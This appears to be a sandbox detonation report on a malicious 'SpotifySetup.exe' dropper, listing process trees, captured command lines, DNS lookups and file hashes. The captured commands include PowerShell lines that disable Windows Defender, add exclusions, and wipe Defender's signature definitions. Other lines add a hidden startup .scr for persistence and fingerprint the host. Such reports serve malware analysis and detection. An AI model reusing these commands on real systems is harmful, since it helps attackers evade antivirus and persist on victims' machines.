PID 3308 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 4992 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4992 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4992 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 5032 wrote to memory of 4784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5032 wrote to memory of 4784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5032 wrote to memory of 4784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 548 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 548 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 548 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 4932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4572 wrote to memory of 908 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 4572 wrote to memory of 908 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 3308 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 1088 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1088 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1088 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3308 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 4796 wrote to memory of 2660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4796 wrote to memory of 2660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4796 wrote to memory of 2660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3308 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3280 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3280 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3280 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3308 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 2836 wrote to memory of 4304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2836 wrote to memory of 4304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2836 wrote to memory of 4304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3308 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3484 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3484 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3484 wrote to memory of 3076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3308 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe
PID 3308 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe

"C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"

C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe

"C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpotifySetup.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 blank-4txk3.in udp
US 8.8.8.8:53 www.matrixhubs.shop udp
N/A 127.0.0.1:60147 tcp
N/A 127.0.0.1:60149 tcp
US 8.8.8.8:53 blank-4txk3.in udp
US 8.8.8.8:53 blank-4txk3.in udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI39962\python311.dll

MD5 0e06f85bcfb1c684469ce62e35b5c272
SHA1 73122369425c1fec9a035975a1834139f6869279
SHA256 6209e55cae73ab3d7bb19a80cd4fb9981b6a3db75bcd5036e84084b23956d9f8
SHA512 c4077f23bf2bc1b2826ad85b4955419b4f79c1bba144372e6706ee8e07ea252d820fdb8c43a6fdd4020fa1e468aff287df443a42b2fdcbd9f41d56f5bbe83b4f

C:\Users\Admin\AppData\Local\Temp\_MEI39962\VCRUNTIME140.dll

MD5 1e6e97d60d411a2dee8964d3d05adb15
SHA1 0a2fe6ec6b6675c44998c282dbb1cd8787612faf
SHA256 8598940e498271b542f2c04998626aa680f2172d0ff4f8dbd4ffec1a196540f9
SHA512 3f7d79079c57786051a2f7facfb1046188049e831f12b549609a8f152664678ee35ad54d1fff4447428b6f76bea1c7ca88fa96aab395a560c6ec598344fcc7fa

memory/3308-26-0x0000000075650000-0x0000000075B5B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI39962\base_library.zip

MD5 83d235e1f5b0ee5b0282b5ab7244f6c4
SHA1 629a1ce71314d7abbce96674a1ddf9f38c4a5e9c
SHA256 db389a9e14bfac6ee5cce17d41f9637d3ff8b702cc74102db8643e78659670a0
SHA512 77364aff24cfc75ee32e50973b7d589b4a896d634305d965ecbc31a9e0097e270499dbec93126092eb11f3f1ad97692db6ca5927d3d02f3d053336d6267d7e5f

C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ctypes.pyd

MD5 35001f868cbc1c3dcd337b1915356b09
SHA1 4b1c0e51ed920d29894739db618952632d6275aa
SHA256 7753972db061b3fd543ec69ed478e05fe6d98e56960c3bdfaa101164a2508fbd
SHA512 fa9628a69fc532b3805cca46d4cdbdb40ac4a8187d87fd469b522797368d588d16a2cb286c43544137849858444f71410deed90dde0cac5a34c9c55d69ddf1ac

C:\Users\Admin\AppData\Local\Temp\_MEI39962\libffi-8.dll

MD5 df5514796b647481d295b14a43f5287f
SHA1 cf52bf55d81d98c46142117fb82d2a9dc7da1b41
SHA256 1e1f2e32114e5c20b1b804c92618318e7a1a7524162a73155e5e1653d08f7b77
SHA512 379d4db1952f9c3a21192e27d98fd9635b66bd928e448c8725d4d9ef479099674863055703b45ac4aefd9ae478994b69948c87b558db092944d1d636e146016a

memory/3308-30-0x0000000075600000-0x000000007561F000-memory.dmp

memory/3308-33-0x00000000755F0000-0x00000000755FD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI39962\_bz2.pyd

MD5 93c79a5faaa4d320432b06ae2879f1f4
SHA1 772b881874a3947f2205644df6eba5972366aab6
SHA256 02eda0188e989264ffb5bfe4474ef1bfa36f8a0baee6764e11b4aa604cc30d47
SHA512 4757e41fa5260601246ee851d43fcffa17eb591dd4e5f987e18b77d9c3269431a610f9b32ebc507c64394c29afe3f7c030d5448417490431742c6c462f156b06

C:\Users\Admin\AppData\Local\Temp\_MEI39962\_ssl.pyd

MD5 92940dcc7b644481d182f58ec45623e7
SHA1 374dbf370ee3a4659a600545ef4e4ba2b699dfea
SHA256 b4d3b352a4aef999497738a30236f9d96e56b1fc92fd268c1736f74c902315f9
SHA512 3ee1d32ff4caa89ea98b8def89b9c22b32199bb3cb0196add71975b260be898138d6a97db1ff2e7c6996dd0ddd03cbecdf32c83f381c1655bb8ad4ea8bb46569

C:\Users\Admin\AppData\Local\Temp\_MEI39962\_sqlite3.pyd

MD5 0a68f6c9a099a00a5ce26d1a3951dda9
SHA1 b03bb0db3f5fe67450878ea141d68e77cad5e2aa
SHA256 ec9d4b312ea445806b50e00f1e4467d4923386e2220af80aae2a759cf633954f
SHA512 ad9dbeabae6fae3f302cae363b8591241adc443f5aade9ac950ebd8f705d4d168f6ef921bc433d45f6ac34055e83fbbbe0d51ee188605b11bda049d4db99fe47

C:\Users\Admin\AppData\Local\Temp\_MEI39962\_socket.pyd

MD5 c3f890e3039c68572f16de4bc34d6ca1
SHA1 d6eb20ec639643a162715c3b631ae5edbd23fae2
SHA256 bc28c36960b8028adc4fe2cc868df2b5c7778b4d4b0c7e15dd0b02a70ac1f5a2
SHA512 ad95294e61391d245ddc4ed139d9765678bb5611f45808e3c985666b53da56f2afd4a46697d937ed1941d7ec64108dc4eaf39144041dc66a65626c7e9dfba90e

C:\Users\Admin\AppData\Local\Temp\_MEI39962\_queue.pyd

MD5 f43666bf65895bfbae75047bb1c6e3bc
SHA1 68bdbbc96c1e0fd742baf12e70cb3f7bcf3c36bd
SHA256 99575c81cd208c47b6cc4c61624ac65c31b91ea957b68d5c3c82a6a6c37cfa70
SHA512 90bbf0749498caec97ad754d844f3d6430aeac2a38e9f8a93ccc1bea4fdc71290a1496ba68d9932588ccad22fbf0d20a8df2a651ca310cfac81b632a04a0f271

C:\Users\Admin\AppData\Local\Temp\_MEI39962\_lzma.pyd

MD5 945c87e35009c0e335a5798d26a6bff5
SHA1 d154e1dbe948ea34c49c598ecb1ba5046ce5701e
SHA256 77e99912e32361e6af44676c841f1da7f028cd01886af6173bd25a8b6c97c748
SHA512 130a0028828d4509bb014be3add814bc638851b8522e1b49c960689435978737b77d892f2aa35e830736f2ed0166dace753b5422a85e14c4a75310488c28748c

C:\Users\Admin\AppData\Local\Temp\_MEI39962\_hashlib.pyd

MD5 368c589936dd438ab4ba01e699b2d057
SHA1 66a0a47a210279066d7d6906fc0502b6d0136ab7
SHA256 35bb95a6c8dd259ccc7ee01ef2c5142d83a41c188bfc1a7d888e3b6988e8e3b7
SHA512 61df0fbd6d668d1aae6555a0199bf6e1c28437d3a3e7bf190c4818908cbcb64d08d6d745b01a692cc2fea6ba101521223da2648f6438870249bd5f3ea5e549f4

C:\Users\Admin\AppData\Local\Temp\_MEI39962\_decimal.pyd

MD5 b6f3b12773dceb50350a472a52c67b74
SHA1 2b260ccc29d576bb3c7b6e845f1aec2df0028f81
SHA256 65ddf0408964eaf41946abf0a28e75023e8a872595056b0d9cdb15c5addc71bf
SHA512 bddb3927bb91a82c8d755b5f17e17d5ad8b56d6f24471fecc8ff37e09c12c6750f583a0199114539185fec17e46f49fe7c381c449bd799dacefdd4cbbbfc7750

C:\Users\Admin\AppData\Local\Temp\_MEI39962\unicodedata.pyd

MD5 bb3d050b8a75f478e4b29897eae427b0
SHA1 1930808a59a8fd9c57ed6039e7614697b4cb03d9
SHA256 06af11548b8a58fed50ae7dbe2fcfbbf04b890926e0fffd70eed02aecc0d97c6
SHA512 be596e2829c6978d7f138f79059172024ee73cd3e1f3d7a24aaca4b0d85a2302e2060e6cebd54854e7f08ed66b665429d38bb22c512dd82533d8ba87a426f515

C:\Users\Admin\AppData\Local\Temp\_MEI39962\sqlite3.dll

MD5 fdbc1adfdeb07195f85bf551cf03a0de
SHA1 94dcf3ec50759ee92335f02fc0f3d9e60305e740
SHA256 563d0bc6b5a401f2c66f67ccaa19c50084b67433ec440bb9cf0a8d81ee269c55
SHA512 bd567a4c6b4627556b02f4299d1b8a9aa7affae0aafbe5a10c92c7e5a08e7f8cbda497f27c01d1ff4352ff1dc1c2fe3c79ff9484e58e6357c96c9a064f5011ea

C:\Users\Admin\AppData\Local\Temp\_MEI39962\select.pyd

MD5 1ecea4488c6503337c5fd9d50c8fb638
SHA1 31c61c788dab5dc58ff479af7eff758a0229253c
SHA256 f20251e6571c43f4ecbbe00e72637f91605886dd76c77557edf7979f71c07d0e
SHA512 c7011d4d67cef3e4a7b1e096dfc0633fcedc4f287676039833c89966995b673c6fb8456e595ba49260dbc7b9bda523256344c4814fa2f8bd10af290861a3b8b6

C:\Users\Admin\AppData\Local\Temp\_MEI39962\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI39962\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI39962\libssl-1_1.dll

MD5 f3d3487191db4bbecc0a775cde827cc1
SHA1 43fef4f4de1185d7ca4dd5e8fa018a57e87b3d31
SHA256 22a0c62fd88787fd64845a9522747f5d960fb3b53b47272b75b96c67524ee222
SHA512 01c957c17d0e37203294b2a7d9fb75fee00e9c854e9b98d847befc5e7bcd9b6e053207fd9b41796e76e95b691324e2545300d1b8434a7da9207998f39b5295cd

C:\Users\Admin\AppData\Local\Temp\_MEI39962\libcrypto-1_1.dll

MD5 f05c8bbd35947b9019ef5f1d427cb07e
SHA1 8703df14305dc624a59808884d71e73877d509b4
SHA256 2267f63a35fd3ff9599867a87fcb8123ea0e872a275f236a053ce8b1d13642d6
SHA512 706058940f03e84045217cf99df0bf2a1e3cafd9ae61daa79acffa863b5403142859c1b66901d4a4deebec77b5e3c4674efa862f01211218f377d02a0a3aa19f

C:\Users\Admin\AppData\Local\Temp\_MEI39962\bound.blank

MD5 cf4fffa69f4ff17db11a7ee6f1a83cde
SHA1 b2a76797b0b53e28120e90adc489045c09b53676
SHA256 eafbe0db258e12897330cacaba4f73179c9768c1dcb0d1f6d6df2620cfa84958
SHA512 d22835a8d04407365bbb49179f1f75e26dd42d0f3fad2b1a266a2c1d67e6606a535faec0e63222536f5891e00445cdacaf56f3a67a953bfc746738ad892d8c63

C:\Users\Admin\AppData\Local\Temp\_MEI39962\blank.aes

MD5 7b1b41206b5b4b4f182f044a3036306b
SHA1 9ff98ad41260b4157e822bb9d06194b8652676c8
SHA256 041febaacd13992e55754900a3fa0a6a6e9e4a71c5cad600a893243d58e56af2
SHA512 ab6af1cf948078c0883abaf49fe9fbce12887e5d26333ac811beb3de7d216a79ffd09a147bff382d9c70579ae558be773adc76b453d381b4758cea1afb745eda

memory/3308-56-0x00000000755C0000-0x00000000755E7000-memory.dmp

memory/3308-58-0x00000000755A0000-0x00000000755B8000-memory.dmp

memory/3308-60-0x0000000075580000-0x000000007559B000-memory.dmp

memory/3308-62-0x0000000075440000-0x0000000075577000-memory.dmp

memory/3308-66-0x00000000753D0000-0x00000000753DC000-memory.dmp

memory/3308-65-0x0000000075420000-0x0000000075436000-memory.dmp

memory/3308-68-0x00000000753A0000-0x00000000753C8000-memory.dmp

memory/3308-74-0x0000000003D30000-0x0000000003F8A000-memory.dmp

memory/3308-73-0x00000000750A0000-0x00000000752FA000-memory.dmp

memory/3308-72-0x0000000075300000-0x0000000075394000-memory.dmp

memory/3308-77-0x0000000075030000-0x0000000075040000-memory.dmp

memory/3308-80-0x0000000075020000-0x000000007502C000-memory.dmp

memory/3308-79-0x0000000075600000-0x000000007561F000-memory.dmp

memory/3308-76-0x0000000075650000-0x0000000075B5B000-memory.dmp

memory/3308-83-0x00000000755F0000-0x00000000755FD000-memory.dmp

memory/3308-84-0x0000000074EF0000-0x0000000075009000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bound.exe

MD5 85091f0dca9adc1bc302eba94fd1398d
SHA1 36d336b4c6ba61112e4f98a8af96605d9a49afbe
SHA256 3b1aa1f5485cd77a5a736b336ed189ac4e837a699acd36fc415c2bc7cb4748de
SHA512 0a98f92a9b1c0e57bd7a4526895a1a0177a3a4783c6b5ee9beee09e3de7b30c97210336e7fca115ed39af7626446b22db7511b508a4280f45b077286225f7888

memory/908-87-0x00007FF6075E0000-0x00007FF607754000-memory.dmp

memory/4932-89-0x0000000002840000-0x0000000002876000-memory.dmp

memory/4784-90-0x0000000004FC0000-0x00000000055E8000-memory.dmp

memory/4932-93-0x0000000005390000-0x00000000053F6000-memory.dmp

memory/4932-92-0x0000000005320000-0x0000000005386000-memory.dmp

memory/3708-91-0x00000000055F0000-0x0000000005612000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgoleqnr.jz5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4932-103-0x0000000005BC0000-0x0000000005F14000-memory.dmp

memory/4784-122-0x0000000005CF0000-0x0000000005D0E000-memory.dmp

memory/4784-123-0x0000000005D20000-0x0000000005D6C000-memory.dmp

memory/4932-125-0x000000006FFA0000-0x000000006FFEC000-memory.dmp

memory/4784-135-0x000000006FFA0000-0x000000006FFEC000-memory.dmp

memory/4932-145-0x0000000006640000-0x000000000665E000-memory.dmp

memory/4784-124-0x00000000062D0000-0x0000000006302000-memory.dmp

memory/4784-146-0x0000000006EE0000-0x0000000006F83000-memory.dmp

memory/3708-147-0x000000006FFA0000-0x000000006FFEC000-memory.dmp

memory/4932-157-0x0000000007A20000-0x000000000809A000-memory.dmp

memory/4932-158-0x00000000073D0000-0x00000000073EA000-memory.dmp

memory/4784-159-0x00000000070B0000-0x00000000070BA000-memory.dmp

memory/4784-160-0x00000000072C0000-0x0000000007356000-memory.dmp

memory/3708-161-0x0000000007AC0000-0x0000000007AD1000-memory.dmp

memory/4784-162-0x0000000007270000-0x000000000727E000-memory.dmp

memory/4784-163-0x0000000007280000-0x0000000007294000-memory.dmp

memory/3708-164-0x0000000007C00000-0x0000000007C1A000-memory.dmp

memory/4932-165-0x00000000076F0000-0x00000000076F8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8ac5e780bfc82dd50924c40aa73fe81a
SHA1 6454c7fc3b018d9eb61e25987a462c56a2f716cc
SHA256 9f75e7f0fef7bade8708623e601335f991cfb2d7b1b1092ca45ac691c2927c71
SHA512 4ddfe91f7c543cb1ce50bc07de137e60e1f104c64c3142600550fb1d20dc2ea123095f6364f15a8ba9acaf0cbb15c91b08c6cf31decefc27c82efc4cbb01ab8d

memory/3308-171-0x0000000075580000-0x000000007559B000-memory.dmp

memory/3308-172-0x0000000075650000-0x0000000075B5B000-memory.dmp

memory/3308-187-0x0000000075440000-0x0000000075577000-memory.dmp

memory/3308-186-0x0000000074EF0000-0x0000000075009000-memory.dmp

memory/3308-183-0x00000000750A0000-0x00000000752FA000-memory.dmp

memory/3308-182-0x0000000075300000-0x0000000075394000-memory.dmp

memory/3308-181-0x00000000753A0000-0x00000000753C8000-memory.dmp

memory/3308-179-0x0000000075420000-0x0000000075436000-memory.dmp

memory/3308-173-0x0000000075600000-0x000000007561F000-memory.dmp

memory/908-188-0x00007FF6075E0000-0x00007FF607754000-memory.dmp

memory/3308-189-0x0000000003D30000-0x0000000003F8A000-memory.dmp

memory/3308-190-0x0000000075650000-0x0000000075B5B000-memory.dmp

memory/2396-216-0x0000000006340000-0x0000000006694000-memory.dmp

memory/2396-218-0x0000000006910000-0x000000000695C000-memory.dmp

memory/2396-219-0x0000000070370000-0x00000000703BC000-memory.dmp

memory/2396-229-0x0000000007B50000-0x0000000007BF3000-memory.dmp

memory/2396-230-0x0000000007DF0000-0x0000000007E01000-memory.dmp

memory/2396-231-0x0000000007E40000-0x0000000007E54000-memory.dmp

memory/3308-233-0x0000000075650000-0x0000000075B5B000-memory.dmp

memory/3308-248-0x0000000075650000-0x0000000075B5B000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\     .scr

MD5 e58de2d31fe7a07e75f79e76ca79ba95
SHA1 a918c93c009c84f98c055926da540558342be0df
SHA256 b4579cb6e46b23c09e34d93fbd190e32ae7a407e5dedba99dcabcdd4b3acc7f1
SHA512 ae6ebeb52c720c5e546bddbeacae2b72f19bdfe4fd21dbbf2b6d6fdfebb21eabfb752dc6f6b76cf365345f686668df290da80756f68d70757818aed49d23ade0

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-21 23:35

Reported

2024-06-21 23:36

Platform

win7-20240508-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-21 23:35

Reported

2024-06-21 23:36

Platform

win10v2004-20240508-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A